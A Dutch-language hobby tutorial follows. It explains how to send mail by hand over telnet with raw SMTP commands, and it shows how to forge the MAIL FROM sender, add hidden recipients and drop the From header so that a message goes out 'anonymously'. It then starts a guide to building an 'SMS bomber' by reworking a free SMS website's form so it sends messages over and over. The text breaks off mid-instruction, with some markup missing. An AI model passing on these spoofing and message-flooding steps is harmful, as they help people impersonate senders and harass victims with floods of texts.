SMTP werkt met commando's, als je deze commando's kent kun je hiermee heel snel mail versturen. Als eerste typ je "helo mail.hotmail.com" dit is om toestemming te vragen om gebruik te maken van de server.

De server moet weten wie je bent, daarom typ je MAIL FROM: gelijkwelk@emailadres.com

Nu moet de server weten naar wie je de mail wilt zenden, de command hiervoor is: RCPT TO: adres@bestemmeling.be (van degene die je wil mailen) Je kunt deze command vaker herhalen, dit is niet zichtbaar in de mail!

Nu zijn alle voorbereidingen getroffen en kan je beginnen met het echte werk: de inhoud van de mail!

Er is één groot nadeel aan, elke tikfout die je maakt wordt op de uiteindelijke mail weergeven en daarna staat nog een vierkantje, dus valt het zeer goed op dat dit met telnet gebeurt is. Werk altijd heel geconcentreerd en typ traag, zo maak je minder fouten!

om te beginnen typ je DATA als je wil kan je nu nog verschillende commands gebruiken die dan wel in de mail zichtbaar zijn, maar wel handig, je moet ze wel intypen VOOR dat je aan de tekst van de mail begint! tik ze over zoals ze hier staan(met ALLE tekentjes!)

From: "naam" hetzelfde als bij MAIL FROM:
To: "naam" hetzelfde als bij RCPT TO:
Subject: FW: onderwerp afhankelijk van de inhoud

Als je een mail anoniem wilt versturen laat je best de command from weg!

nu laat je een regel open en begin je met het mailtje (let op de tikfouten!!!)
Als je denkt het mailtje af te hebben en je wilt het versturen, neem dan een nieuwe regel en tik een "." (=punt)

_______________________________________________________________

Als je een andere serven dan mail.hotmail.com wil gebruiken, kan je meestal deze van je provider gebruiken! bv: mail.home.nl of mail.belgacom.net ....

 

 

 

SMS bomber maken

Hoe maak ik een eigen SmsBomer in JavaScript?

Als 1e wil ik even kwijt dat dit een SIMPELE SmsBomer is!!

-Beginnen met zoeken

Ok, je hebt iets nodig dat de smsjes verstuurd. Je kent ze wel, de site's die gratis smsen mogelijk maken. Kies er een uit waarbij je niet hoeft in te loggen en waarmee je oneindig kunt verzenden. Het is ook wel handig om er 1 te nemen waar je veel tekens in het smsje kunt zetten.



-Beginnen met editen

Als je zo'n site gevonden hebt save je hem ergens op je harde schijf. Je opent de site met een html-editor (of als je het allemaal wel met de hand denkt te kunnen, met een tekst verwerker). Je kunt eigenlijk alles wel deleten behalve wat tussen

en

staat. En je moet natuurlijk de standaard codes laten staan(